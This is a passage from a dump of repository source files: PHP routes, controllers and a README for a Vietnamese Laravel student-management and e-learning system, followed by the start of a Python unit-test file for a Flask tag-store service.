{\n return 1;\n }\n }\n public function dshvLopHoc($malop)\n {\n $lopHoc = DB::table('lop_hoc')\n ->where('id', $malop)\n ->first();\n $dshv = DB::table('dssv_lop_hoc')\n ->join('users', 'users.id', '=', 'dssv_lop_hoc.masv')\n ->select('dssv_lop_hoc.*', 'users.name')\n ->where('malop', $malop)\n ->get();\n return view('giang-vien.danhSachHocVien', ['dshv' => $dshv, 'lopHoc' => $lopHoc]);\n }\n}\n" }, { "alpha_fraction": 0.5052631497383118, "alphanum_fraction": 0.5280701518058777, "avg_line_length": 26.14285659790039, "blob_id": "2da4a605e4fa21e2c98766cbaba79a0d5965f7d3", "content_id": "d95f450a6cecdea8aba59ff711b3ec4683bb6592", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 573, "license_type": "no_license", "max_line_length": 86, "num_lines": 21, "path": "/public/demotest.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n function kTraDiemDanh($masv, $filename)\n{\n $kiemtra = false;\n $handle = fopen($filename, 'r');\n $content = fread($handle, filesize($filename));\n $dssv = explode(\"\\n\", $content);\n// print_r($dssv);\n foreach ($dssv as $item) {\n $sinhvien = explode(\"-\", $item);\n if ($masv == $sinhvien[1]) {\n $kiemtra = false;\n break;\n } else {\n $kiemtra = true;\n }\n }\n fclose($handle);\n return $kiemtra;\n}\necho kTraDiemDanh(2,'dsdiemdanh/công nghệ pm cs403A 30-12-2020.txt') ? 'true':'false';\n" }, { "alpha_fraction": 0.7735471129417419, "alphanum_fraction": 0.7735471129417419, "avg_line_length": 248.5, "blob_id": "9519582121562ac153a3defa3716aa850b0cc416", "content_id": "e049f7eafd94e1839dab6ce1ec26b3d8691006bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 632, "license_type": "no_license", "max_line_length": 450, "num_lines": 2, "path": "/README.md", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "# Hệ thống quản lý sinh viên tích hợp elearning\n hệ thống quản lý sinh viên và giảng viên sử dụng php và framework Laravel - mySQL giống như các trường học và tích hợp thêm elearning để cho sinh viên có thể vào để tải tài liệu, vô lớp học online, chatting. ngoài ra còn có thêm chức năng xịn xò là quét gương mặt (sử dụng công nghệ nhận diện gương mặt TEACHTABLE MACHINE của google ) để tránh trường hợp mấy thanh niên khác vào tải tài liệu ké hoặc vào phá lớp học hoặc đăng kí tín chỉ dùm bla blab\n" }, { "alpha_fraction": 0.7288153171539307, "alphanum_fraction": 0.7288153171539307, "avg_line_length": 72.8923110961914, "blob_id": "e613b67d39cbe9b6cf9089a4d2b1be1a0f3e9b20", "content_id": "9952e264a3b5a63283fa20abc6772c6a85683af7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 9639, "license_type": "no_license", "max_line_length": 164, "num_lines": 130, "path": "/routes/web.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nuse App\\Http\\Controllers\\DiemDanhController;\nuse App\\Http\\Controllers\\DocumentController;\nuse App\\Http\\Controllers\\InfomationController;\nuse App\\Http\\Controllers\\LopHocController;\nuse App\\Http\\Controllers\\MonHocController;\nuse App\\Http\\Controllers\\NguoiDungController;\nuse App\\Http\\Controllers\\ZoomController;\nuse App\\Models\\ThongBao;\nuse Illuminate\\Support\\Facades\\Route;\nuse Illuminate\\Support\\Facades\\Auth;\n\n/*\n|--------------------------------------------------------------------------\n| Web Routes\n|--------------------------------------------------------------------------\n|\n| Here is where you can register web routes for your application. These\n| routes are loaded by the RouteServiceProvider within a group which\n| contains the \"web\" middleware group. Now create something great!\n|\n*/\n\n\n\nRoute::get('/', function () {\n $infomation=ThongBao::all();\n return view('trangchu',['infomation' => $infomation]);\n})->name('trangchu');\n//Admin route\nRoute::get('/admin/home', [\\App\\Http\\Controllers\\AdminController::class, 'index'])->name('admin.home')->middleware('admin');\n//admin-Giang Vien\nRoute::get('admin/show-giang-vien', [\\App\\Http\\Controllers\\GiangVienController::class, 'showGiangVien'])->name('admin.showGiangVien');\nRoute::post('admin/save-giang-vien', [\\App\\Http\\Controllers\\GiangVienController::class, 'saveGiangVien'])->name('admin.saveGiangVien');\nRoute::get('admin/them-giang-vien', [\\App\\Http\\Controllers\\GiangVienController::class, 'createGiangVien'])->name('admin.createGiangVien');\nRoute::get('/admin/sua-giang-vien/{id}', [\\App\\Http\\Controllers\\GiangVienController::class, 'suaGiangVien'])->name('admin.suaGiangVien');\nRoute::post('/admin/edit-giang-vien/{id}', [\\App\\Http\\Controllers\\GiangVienController::class, 'editGiangVien'])->name('admin.editGiangVien');\nRoute::delete('/admin/xoa-giang-vien/{id}', [\\App\\Http\\Controllers\\GiangVienController::class, 'xoaGiangVien'])->name('admin.xoaGiangVien');\n//admin Sinh Vien\nRoute::get('admin/show-sinh-vien', [\\App\\Http\\Controllers\\SinhVienController::class, 'showSinhVien'])->name('admin.showSinhVien');\nRoute::post('admin/save-sinh-vien', [\\App\\Http\\Controllers\\SinhVienController::class, 'saveSinhVien'])->name('admin.saveSinhVien');\nRoute::get('admin/them-sinh-vien', [\\App\\Http\\Controllers\\SinhVienController::class, 'createSinhVien'])->name('admin.createSinhVien');\nRoute::get('/admin/sua-sinh-vien/{id}', [\\App\\Http\\Controllers\\SinhVienController::class, 'suaSinhVien'])->name('admin.suaSinhVien');\nRoute::post('/admin/edit-sinh-vien/{id}', [\\App\\Http\\Controllers\\SinhVienController::class, 'editSinhVien'])->name('admin.editSinhVien');\nRoute::delete('/admin/xoa-sinh-vien/{id}', [\\App\\Http\\Controllers\\SinhVienController::class, 'xoaSinhVien'])->name('admin.xoaSinhVien');\n//admin Lớp Học\nRoute::get('admin/show-lop-hoc', [\\App\\Http\\Controllers\\SubjectClassController::class, 'showLopHoc'])->name('admin.showLopHoc');\nRoute::post('admin/save-lop-hoc', [\\App\\Http\\Controllers\\SubjectClassController::class, 'saveLopHoc'])->name('admin.saveLopHoc');\nRoute::get('admin/them-lop-hoc', [\\App\\Http\\Controllers\\SubjectClassController::class, 'createLopHoc'])->name('admin.createLopHoc');\nRoute::get('/admin/sua-lop-hoc/{id}', [\\App\\Http\\Controllers\\SubjectClassController::class, 'suaLopHoc'])->name('admin.suaLopHoc');\nRoute::post('/admin/edit-lop-hoc/{id}', [\\App\\Http\\Controllers\\SubjectClassController::class, 'editLopHoc'])->name('admin.editLopHoc');\nRoute::delete('/admin/xoa-lop-hoc/{id}', [\\App\\Http\\Controllers\\SubjectClassController::class, 'xoaLopHoc'])->name('admin.xoaLopHoc');\n//admin giảng dạy\nRoute::get('admin/show-giang-day', [\\App\\Http\\Controllers\\GiangDayController::class, 'showGiangDay'])->name('admin.showGiangDay');\nRoute::post('admin/save-giang-day', [\\App\\Http\\Controllers\\GiangDayController::class, 'saveGiangDay'])->name('admin.saveGiangDay');\nRoute::delete('/admin/xoa-giang-day/{id}', [\\App\\Http\\Controllers\\GiangDayController::class, 'xoaGiangDay'])->name('admin.xoaGiangDay');\n\n//user chỉnh sửa thông tin cá nhân\nRoute::get('user/sua-thong-tin/{id}', [\\App\\Http\\Controllers\\NguoiDungController::class, 'createFormSuaThongTin'])->name('user.InfomationEditForm');\nRoute::post('user/edit-thong-tin/{id}', [\\App\\Http\\Controllers\\NguoiDungController::class, 'suaThongTinCaNhan'])->name('user.editThongTin');\nRoute::get('users/xem-thong-tin-nguoi-dung/{id}', [NguoiDungController::class,'xemThongTinNguoiDung'])->name('user.xemThongTin');\n// Route::get('user/xem-ds-lop/{id}', [\\App\\Http\\Controllers\\NguoiDungController::class, 'xemDSLopHoc'])->name('user.xemDsLop');\n// Route::get('user/xem-chi-tiet-lop-hoc/{malop}', [\\App\\Http\\Controllers\\NguoiDungController::class, 'xemChiTietlop'])->name('user.xemChiTietLop');\n// Route::get('user/form-cap-nhap-diem-cc/{malop}/{masv}', [\\App\\Http\\Controllers\\NguoiDungController::class, 'formCapNhapDiemCC'])->name('user.formCapNhapDiemCC');\n// Route::post('user/cap-nhap-diemcc/{malop}/{masv}',[\\App\\Http\\Controllers\\NguoiDungController::class,'capNhapDiemCC'])->name('user.capNhapDiemcc');\n\n\n//Giảng viên\nRoute::get('giangvien/dang-ki-mo-lop', [LopHocController::class,'ViewDangKiMoLop'])->name('giangvien.viewDangKiMoLop')->middleware('giang-vien');\nRoute::post('giangvien/save-lop-hoc', [LopHocController::class, 'saveLopHoc'])->name('giangvien.saveLopHoc')->middleware('giang-vien');\nRoute::get('giangvien/xem-ds-lop-hoc/{magv}',[LopHocController::class,'danhSachLopHoc'])->name('giangvien.dsLopHoc')->middleware('giang-vien');\nRoute::get('giangvien/ds-hoc-vien/{malop}',[LopHocController::class,'dshvLopHoc'])->name('giangvien.xemDSHocVien')->middleware('giang-vien');\nRoute::get('giangvien/tao-zoom-room/{malop}',[ZoomController::class,'createZoomCLassForm'])->name('giangvien.taoZoomClass')->middleware('giang-vien');\nRoute::post('giangvien/tao-zoom-room',[ZoomController::class,'createZoomClass'])->name('giangvien.saveZoomClass')->middleware('giang-vien');\nRoute::get('giangvien/sua-zoom-room/{malop}',[ZoomController::class,'editZoomClassForm'])->name('giangvien.editZoomClassForm')->middleware('giang-vien');\nRoute::post('giangvien/edit-zoom-room',[ZoomController::class,'editZoomClass'])->name('giangvien.editZoomClass')->middleware('giang-vien');\nRoute::delete('giangvien/delete-zoom-room/{id}',[ZoomController::class,'deleteZoomClass'] )->name('giangvien.deleteZoomClass')->middleware('giang-vien');\n//xem lớp học\nRoute::get('user/chi-tiet-lop-hoc/{malop}/{userid}',[LopHocController::class,'viewChiTietLopHoc'])->name('user.chiTietLopHoc');\n\n//online class\nRoute::get('user/online-class/{malop}',[ZoomController::class,'indexOnlineClass'])->name('user.viewOnlineClass');\n\n\n// môn học\nRoute::get('admin/xem-ds-mon-hoc',[MonHocController::class,'index'])->name('admin.xemDSMonHoc');\nRoute::get('admin/them-mon-hoc',[MonHocController::class,'createMonHocView'])->name('admin.formThemMonHoc');\nRoute::post('admin/them-mon-hoc',[MonHocController::class,'themMonHoc'])->name('admin.themMonHoc');\nRoute::get('admin/update-mon-hoc/{mamh}',[MonHocController::class,'updateMonHocView'])->name('admin.formupdateMonHoc');\nRoute::post('admin/update-mon-hoc',[MonHocController::class,'update'])->name('admin.updateMonHoc');\nRoute::delete('admin/delete-mon-hoc/{id}',[MonHocController::class,'delete'])->name('admin.deleteMonHoc');\n//Học viên\nRoute::get('hocvien/dang-ki-lop-hoc',[LopHocController::class,'ViewDangKiLopHoc'])->name('hocvien.viewDangKiLopHoc');\nRoute::post('hocvien/save-dang-ki-lop-hoc',[LopHocController::class,'dangKiLopHoc'])->name('hocvien.saveDangKiLopHoc');\nRoute::get('hocvien/ds-lop-hoc/{masv}',[LopHocController::class,'danhSachLopHocHocVien'])->name('hocvien.xemDsLopHoc');\n\n//Thông báo\nRoute::get('admin/xem-ds-thong-bao',[InfomationController::class,'index'])->name('admin.xemDSThongBao');\nRoute::get('admin/them-thong-bao',[InfomationController::class,'createView'])->name('admin.viewAddThongBao');\nRoute::post('admin/them-thong-bao',[InfomationController::class,'create'])->name('admin.themThongBao');\nRoute::delete('admin/xoa-thong-bao/{id}',[InfomationController::class,'delete'])->name('admin.xoaThongBao');\n//điểm danh\n// Route::get('/xu-ly-diem-danh', [\\App\\Http\\Controllers\\DiemDanhController::class, 'diemDanh'])->name('diemdanh');\n// Route::get('ghi-thong-tin-diem-danh/{malop}', [\\App\\Http\\Controllers\\DiemDanhController::class, 'ghiThongTinDiemDanh'])->name('ghiThongTinDiemDanh');\n// Route::get('xem-ds-diem-danh/{malop}', [\\App\\Http\\Controllers\\DiemDanhController::class, 'xemKQDiemDanh'])->name('xemKQDiemDanh');\n// Route::get('huy-diem-danh', function () {\n// return view('huyDiemDanh');\n// })->name('huyDiemDanh');\nRoute::get('/diemdanh/{malop}',[DiemDanhController::class,'createFormDiemDanh'])->name('hocvien.diemdanh');\n\nRoute::get('/ket-qua-diem-danh/{id}', function ($id){\n return view('ketQuaDiemDanh',['userid'=>$id]);\n});\n\n\n\nAuth::routes();\nRoute::get('/home', [App\\Http\\Controllers\\HomeController::class, 'index'])->name('home');\nRoute::group(['middleware' => ['auth', 'admin']], function () {\n Route::get('admin-view', [\\App\\Http\\Controllers\\HomeController::class, 'adminView'])->name('admin.view');\n});\n\n\n// File upload & download\n// Route::resource('documents', 'DocumentController');\nRoute::get('documents/{uuid}/download', [DocumentController::class,'download'])->name('documents.download');\nRoute::get('documents/index/{malop}',[DocumentController::class,'index'])->name('documents.index');\nRoute::get('documents/create/{malop}',[DocumentController::class,'create'])->name('documents.create');\nRoute::post('documents/store',[DocumentController::class,'store'])->name('documents.store');\n" }, { "alpha_fraction": 0.4962962865829468, "alphanum_fraction": 0.49845677614212036, "avg_line_length": 31.399999618530273, "blob_id": "9dc8b5be1f2d943e15909719ae40ce8891609fab", "content_id": "68d9ee98c3b1b251031e713df6c1cd8eeca8ecba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 3278, "license_type": "no_license", "max_line_length": 104, "num_lines": 100, "path": "/app/Http/Controllers/SinhVienController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Models\\SinhVien;\nuse Illuminate\\Http\\Request;\n\nclass SinhVienController extends Controller\n{\n public function __construct()\n {\n $this->middleware('admin');\n }\n\n public function showSinhVien()\n {\n $sinhvien = SinhVien::all();\n return view('admin.showSinhVien', ['sinhvien' => $sinhvien]);\n }\n\n public function createSinhVien()\n {\n return view('admin.themSinhVien');\n }\n\n public function saveSinhVien(Request $request)\n {\n try {\n $sinhVien = new SinhVien();\n $sinhVien->name = \\request('name');\n $date = \\request('ngay');\n $month = \\request('thang');\n $year = \\request('nam');\n $ngaysinh = $year . '-' . $month . '-' . $date;\n $sinhVien->ngay_sinh = $ngaysinh;\n $sinhVien->gioi_tinh=\\request('gioi_tinh');\n //upload anh dai dien\n $get_image=$request->file('anh');\n if($get_image){\n $new_image=\\request('name').'-'.rand(0,99).'.'.$get_image->getClientOriginalExtension();\n $get_image->move('upload/sinhVien',$new_image);\n $sinhVien->anh=\"upload/sinhVien/$new_image\";\n }\n $sinhVien->save();\n $msg = \"thêm thành công\";\n } catch (\\Exception $e) {\n $msg = \"có lỗi xảy ra vui lòng thử lại\";\n }\n return redirect('admin/them-sinh-vien')->with('msg', $msg);\n }\n\n public function suaSinhVien($id)\n {\n $sinhvien = SinhVien::where('id', $id)->first();\n\n return view('admin.suaSinhVien', ['sinhvien' => $sinhvien]);\n }\n\n public function editSinhVien(Request $request,$id)\n {\n try {\n $sinhVien = SinhVien::where('id', $id)->first();\n $sinhVien->name = \\request('name');\n $date = \\request('ngay');\n $month = \\request('thang');\n $year = \\request('nam');\n $ngaysinh = $year . '-' . $month . '-' . $date;\n $sinhVien->ngay_sinh = $ngaysinh;\n $sinhVien->gioi_tinh=\\request('gioi_tinh');\n $get_image=$request->file('anh');\n if($get_image){\n $new_image=\\request('name').'-'.rand(0,99).'.'.$get_image->getClientOriginalExtension();\n $get_image->move('upload/sinhVien',$new_image);\n $sinhVien->anh=\"upload/sinhVien/$new_image\";\n }else{\n if(!$sinhVien->anh){\n $sinhVien->anh='';\n }\n }\n// luu ket qua\n $sinhVien->save();\n $msg_edit = \"chỉnh sửa thành công\";\n } catch (\\Exception $e) {\n $msg_edit = \"chỉnh sửa thất bại\";\n }\n return redirect('admin/sua-sinh-vien/' . $id)->with('msg_edit', $msg_edit);\n }\n\n public function xoaSinhVien($id)\n {\n // try {\n $sinhvien = SinhVien::findOrFail($id);\n $sinhvien->delete();\n $msg_delete = \"đã xóa 1 item\";\n // } catch (\\Exception $e) {\n // $msg_delete = \"có lỗi vui lòng thử lại\";\n // }\n return redirect('/admin/show-sinh-vien')->with('msg_delete', $msg_delete);\n }\n}\n" }, { "alpha_fraction": 0.4987320303916931, "alphanum_fraction": 0.4991546869277954, "avg_line_length": 27.506023406982422, "blob_id": "6f97f4111e6045e8d52fef92d316ea3a05b45fe7", "content_id": "4b5cca5be570194053a186533f1503fe79cada30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 2401, "license_type": "no_license", "max_line_length": 93, "num_lines": 83, "path": "/app/Http/Controllers/MonHocController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Models\\MonHoc;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass MonHocController extends Controller\n{\n //\n public function __construct()\n {\n $this->middleware('admin');\n }\n public function index()\n {\n $monhoc = MonHoc::all();\n return view('monhoc.index', ['monhoc' => $monhoc]);\n }\n public function createMonHocView()\n {\n return view('monhoc.create');\n }\n public function themMonHoc(Request $request)\n {\n try {\n if ($this->kiemtraMaMH($request->mamh)) {\n $monhoc = new MonHoc();\n $monhoc->mamh = $request->mamh;\n $monhoc->tenmh = $request->tenmh;\n $monhoc->mota = $request->mota;\n $monhoc->save();\n $msg = \"thêm môn học thành công\";\n } else {\n $msg = \"mã môn học bị trùng\";\n }\n } catch (\\Exception $e) {\n $msg = \"something error\";\n }\n return redirect(route('admin.formThemMonHoc'))->with('msg', $msg);\n }\n public function kiemtraMaMH($mamh)\n {\n $monhoc = DB::select('select * from mon_hoc where mamh = ?', [$mamh]);\n if ($monhoc) {\n return false;\n } else {\n return true;\n }\n }\n public function updateMonHocView($mamh)\n {\n $monhoc = MonHoc::find($mamh);\n return view('monhoc.update', ['monhoc' => $monhoc]);\n }\n public function update(Request $request)\n {\n try {\n $id = $request->id;\n $monhoc = MonHoc::find($id);\n $monhoc->mamh = $request->mamh;\n $monhoc->tenmh = $request->tenmh;\n $monhoc->mota = $request->mota;\n $monhoc->save();\n $msg = 'update thành công';\n } catch (\\Exception $e) {\n $msg='có lỗi, vui lòng thử lại';\n }\n return redirect(route('admin.formupdateMonHoc', ['mamh' => $id]))->with('msg', $msg);\n }\n public function delete($id)\n {\n try{\n $monhoc = MonHoc::findOrFail($id);\n $monhoc->delete();\n $msg = \"đã xóa 1 môn\";\n }catch(\\Exception $e){\n $msg=\"có lỗi, vui lòng thử lại\";\n }\n return redirect(route('admin.xemDSMonHoc'))->with('msg', $msg);\n }\n}\n" }, { "alpha_fraction": 0.6273291707038879, "alphanum_fraction": 0.6273291707038879, "avg_line_length": 27.41176414489746, "blob_id": "7899b003a4cedc2bdad4e1897427f066f1f334ac", "content_id": "af3ec920852bff7b4a47ef72a8dca4159976d927", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 969, "license_type": "no_license", "max_line_length": 75, "num_lines": 34, "path": "/app/Http/Controllers/InfomationController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Models\\ThongBao;\nuse Illuminate\\Http\\Request;\n\nclass InfomationController extends Controller\n{\n public function __construct(){\n $this->middleware('admin');\n }\n public function index(){\n $infomation=ThongBao::all();\n return view('thong-bao.index',['information'=>$infomation]);\n }\n public function createView(){\n return view('thong-bao.themThongBao');\n }\n public function create(Request $request){\n $infomation =new ThongBao();\n $infomation->content=$request->content;\n $infomation->user_id=$request->user_id;\n $infomation->save();\n $msg=\"thêm thành công\";\n return redirect(route('admin.viewAddThongBao'))->with('msg', $msg);\n }\n public function delete($id){\n $infomations=\n $infomation=ThongBao::findOrFail($id);\n $infomation->delete();\n return redirect(route('admin.xemDSThongBao'));\n }\n}\n" }, { "alpha_fraction": 0.511600911617279, "alphanum_fraction": 0.5136311054229736, "avg_line_length": 32.47572708129883, "blob_id": "6f3351cf619b2f29b9fc52cab14b4f0c08206d10", "content_id": "59718c2e7e48d65399786bc932bc123496e8e82a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 3486, "license_type": "no_license", "max_line_length": 104, "num_lines": 103, "path": "/app/Http/Controllers/GiangVienController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Models\\GiangVien;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\Hash;\n\nclass GiangVienController extends Controller\n{\n public function __construct()\n {\n $this->middleware('admin');\n }\n\n public function showGiangVien()\n {\n $giangvien = GiangVien::all();\n return view('admin.showGiangVien', ['giangvien' => $giangvien]);\n }\n\n public function createGiangVien()\n {\n return view('admin.themGiangVien');\n }\n\n public function saveGiangVien(Request $request)\n {\n try {\n $giangVien = new GiangVien;\n $giangVien->name = \\request('name');\n $giangVien->email = \\request('email');\n $date = \\request('ngay');\n $month = \\request('thang');\n $year = \\request('nam');\n $ngaysinh = $year . '-' . $month . '-' . $date;\n $giangVien->ngay_sinh = $ngaysinh;\n $giangVien->password=Hash::make(\\request('password'));\n //upload anh dai dien\n $get_image=$request->file('anh');\n if($get_image){\n $new_image=\\request('name').'-'.rand(0,99).'.'.$get_image->getClientOriginalExtension();\n $get_image->move('upload/giangVien',$new_image);\n $giangVien->anh=\"upload/giangVien/$new_image\";\n }\n $giangVien->save();\n $msg = \"thêm thành công\";\n } catch (\\Exception $e) {\n $msg = \"có lỗi xảy ra vui lòng thử lại\";\n }\n return redirect('admin/them-giang-vien')->with('msg', $msg);\n }\n\n public function suaGiangVien($id)\n {\n $giangvien = GiangVien::where('id', $id)->first();\n\n return view('admin.suaGiangVien', ['giangvien' => $giangvien]);\n }\n\n public function editGiangVien(Request $request,$id)\n {\n try {\n $giangVien = GiangVien::where('id', $id)->first();\n $giangVien->name = \\request('name');\n $giangVien->email = \\request('email');\n $date = \\request('ngay');\n $month = \\request('thang');\n $year = \\request('nam');\n $ngaysinh = $year . '-' . $month . '-' . $date;\n $giangVien->ngay_sinh = $ngaysinh;\n $giangVien->password=Hash::make(\\request('password'));\n $get_image=$request->file('anh');\n if($get_image){\n $new_image=\\request('name').'-'.rand(0,99).'.'.$get_image->getClientOriginalExtension();\n $get_image->move('upload/giangVien',$new_image);\n $giangVien->anh=\"upload/giangVien/$new_image\";\n }else{\n if(!$giangVien->anh){\n $giangVien->anh='';\n }\n }\n// luu ket qua\n $giangVien->save();\n $msg_edit = \"chỉnh sửa thành công\";\n } catch (\\Exception $e) {\n $msg_edit = \"chỉnh sửa thất bại\";\n }\n return redirect('admin/sua-giang-vien/' . $id)->with('msg_edit', $msg_edit);\n }\n\n public function xoaGiangVien($id)\n {\n try {\n $giangvien = GiangVien::findOrFail($id);\n $giangvien->delete();\n $msg_delete = \"đã xóa 1 item\";\n } catch (\\Exception $e) {\n $msg_delete = \"có lỗi vui lòng thử lại\";\n }\n return redirect('/admin/show-giang-vien')->with('msg_delete', $msg_delete);\n }\n}\n" } ]
17
cchdo/tagstore
https://github.com/cchdo/tagstore
98688046959edaac7192609e9515d3f064c5438a
e7e0703536d86d06eeb33ae72ecada56588897e2
2c5c87e35ed767981d1859a93af2b63fe8655fdf
refs/heads/master
2020-04-19T21:03:37.192440
2014-11-25T01:34:08
2014-11-25T01:34:08
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5602279305458069, "alphanum_fraction": 0.5683238506317139, "avg_line_length": 34.73735809326172, "blob_id": "0b79e28fc80fe46a91d4a2339c138f96301ec147", "content_id": "8063871d7092f3b2b4c0e9df6928763bdfcbfc1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25445, "license_type": "no_license", "max_line_length": 91, "num_lines": 712, "path": "/tests.py", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "import json\nimport types\nimport os.path\nfrom datetime import datetime, timedelta\nfrom StringIO import StringIO\nimport logging\nfrom time import sleep\nfrom threading import Thread, Condition, current_thread\nfrom multiprocessing import Process, Condition as mCondition\nfrom shutil import rmtree\nfrom urlparse import urlsplit\n\nlog = logging.getLogger(__name__)\n\nfrom nose.tools import nottest\n\nfrom flask import Flask\nfrom flask.ext.testing import TestCase, LiveServerTestCase\nfrom flask.ext.restless import ProcessingException\n\nimport requests\n\nimport tagstore\nfrom tagstore import server\nfrom tagstore.server import ofs, OFSWrapper\nfrom tagstore.client import TagStoreClient, Query, DataResponse\nfrom tagstore.models import db, Tag, Data\n\n\nAPI_ENDPOINT = '/api/v1'\n\n\ndef _create_test_app(self):\n app = Flask(__name__)\n app.config.from_object('tagstore.settings.default')\n app.config.from_object('tagstore.settings.test')\n server.init_app(app)\n return app\n\n\nclass BaseTest(TestCase):\n create_app = _create_test_app\n\n def setUp(self):\n db.create_all()\n try:\n rmtree(self.app.config['PTOFS_DIR'])\n except OSError:\n pass\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n try:\n rmtree(self.app.config['PTOFS_DIR'])\n except OSError:\n pass\n\n\nclass TestUnit(BaseTest):\n def test_replace_existing_tags(self):\n data = {'tags': []}\n server.replace_existing_tags(data)\n self.assertTrue(data['tags'] == [])\n\n data = {'tags': [{'tag': 'aaa'}]}\n server.replace_existing_tags(data)\n self.assertTrue(data['tags'][0] == {'tag': 'aaa'})\n\n db.session.add(Tag('aaa'))\n db.session.flush()\n data = {'tags': [{'tag': 'aaa'}]}\n server.replace_existing_tags(data)\n tag = Tag.query.filter_by(tag='aaa').first()\n self.assertTrue(data['tags'][0] == {'id': tag.id})\n\n data = {'tags': [{'tag': 'aaa'}, {'tag': 'bbb'}]}\n server.replace_existing_tags(data)\n tag = Tag.query.filter_by(tag='aaa').first()\n self.assertTrue(data['tags'][0] == {'id': tag.id})\n self.assertTrue(data['tags'][1] == {'tag': 'bbb'})\n\n def test_data_post(self):\n data = {'uri': 'abcd'}\n server.data_post(data)\n\n db.session.add(Data('abcd'))\n db.session.flush()\n with self.assertRaises(ProcessingException):\n server.data_post(data)\n\n def test_update_http_headers(self):\n headers = {}\n metadata = {}\n server._update_http_headers(headers, metadata, as_attachment=True)\n self.assertEqual(headers['Content-Disposition'], 'attachment; filename=')\n self.assertEqual(headers['Content-Type'], 'application/octet-stream')\n metadata['fname'] = 'test.txt'\n server._update_http_headers(headers, metadata)\n self.assertEqual(headers['Content-Disposition'],\n 'inline; filename=test.txt')\n self.assertEqual(headers['Content-Type'], 'text/plain')\n\n def test_zip_load(self):\n data = 'http://999.0.0.0'\n ddd = Data(data, 'broken')\n arcname = 'namea'\n szip = server.TempFileStreamingZipFile([server.DataWrapper(arcname, ddd, 'ofs')])\n zfile = iter(szip)\n contents = zfile.next()\n self.assertEqual(len(contents), 22)\n\n def test_zip_max_size(self):\n data = 'data:text/html,'\n ddd = Data(data, 'nameb')\n arcname = 'namea'\n szip = server.TempFileStreamingZipFile([server.DataWrapper(arcname, ddd, 'ofs')])\n self.assertEqual(szip.max_size(), 22 + 88 + (len(arcname) + 1) * 2)\n\n\nclass RoutedTest(BaseTest):\n headers_json = {'Content-Type': 'application/json'}\n\n def http(self, func, endpoint, **kwargs):\n try:\n headers = kwargs['headers']\n except KeyError:\n headers = self.headers_json\n else:\n headers.update(self.headers_json)\n del kwargs['headers']\n func = getattr(self.client, func)\n return func(endpoint, headers=headers, **kwargs)\n\n\nclass TestViews(RoutedTest):\n api_data_endpoint = '{0}/data'.format(API_ENDPOINT)\n api_ofs_endpoint = '{0}/ofs'.format(API_ENDPOINT)\n api_zip_endpoint = '{0}/zip'.format(API_ENDPOINT)\n\n def test_data_post(self):\n data = {'uri': 'http://example.com', 'fname': 'testname'}\n response = self.http('post', self.api_data_endpoint, data=json.dumps(data))\n self.assert_status(response, 201, 'Failed to create data')\n data = {'uri': 'aaa'}\n response = self.http('post', self.api_data_endpoint, data=json.dumps(data))\n self.assert_status(response, 201, 'Failed to create data')\n data = {'uri': 'bbb', 'tags': []}\n response = self.http('post', self.api_data_endpoint, data=json.dumps(data))\n self.assert_status(response, 201, 'Failed to create data')\n data = {'uri': 'ccc', 'tags': [{'tag': 'ddd'}, {'tag': 'eee'}]}\n response = self.http('post', self.api_data_endpoint, data=json.dumps(data))\n self.assert_status(response, 201, 'Failed to create data')\n data = {'uri': 'ccc', 'tags': []}\n response = self.http('post', self.api_data_endpoint, data=json.dumps(data))\n self.assert_status(response, 409, 'Failed to identify conflict')\n\n def test_data_patch(self):\n data = {'uri': 'http://example.com'}\n response = self.http('post', self.api_data_endpoint, data=json.dumps(data))\n self.assert_status(response, 201, 'Failed to create data')\n tags = [{'tag': 'ddd'}, {'tag': 'eee'}]\n data = {'uri': 'http://example.com', 'tags': tags}\n uri = '{0}/{1}'.format(self.api_data_endpoint, response.json['id'])\n response = self.http('put', uri, data=json.dumps(data))\n self.assert_status(response, 200, 'Failed to edit data')\n self.assertEqual(sorted(x['tag'] for x in response.json['tags']),\n sorted(x['tag'] for x in tags))\n\n tags = [{'tag': 'eee'}]\n data = {'uri': 'http://example.com', 'tags': tags}\n uri = '{0}/{1}'.format(self.api_data_endpoint, response.json['id'])\n response = self.http('put', uri, data=json.dumps(data))\n self.assert_status(response, 200, 'Failed to edit data')\n self.assertEqual(sorted(x['tag'] for x in response.json['tags']),\n sorted(x['tag'] for x in tags))\n\n def test_data_query(self):\n filters = [dict(name='tags', op='any', val=dict(name='tag', op='eq', val='d'))]\n params = 